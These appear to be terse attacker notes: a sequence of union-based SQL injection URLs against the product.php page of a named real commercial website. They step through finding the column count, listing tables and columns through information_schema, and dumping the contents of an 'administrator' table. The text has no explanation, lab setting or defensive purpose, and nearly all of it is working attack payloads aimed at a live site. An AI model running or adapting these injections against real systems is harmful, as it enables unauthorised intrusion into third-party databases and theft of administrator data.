SELECT*FROM product where id=

http://nhuaphucthinh.com.vn/product.php?id=-11%20union%20select%201,2,3,4,5,6,7,8,9,10,11

information_schema.tables
information_schema.columns

http://nhuaphucthinh.com.vn/product.php?id=-11 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()

http://nhuaphucthinh.com.vn/product.php?id=-11 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database() and table_name='administrator'

http://nhuaphucthinh.com.vn/product.php?id=-11 union select 1,2,group_concat(admfullname),4,5,6,7,8,9,10,11 from administrator

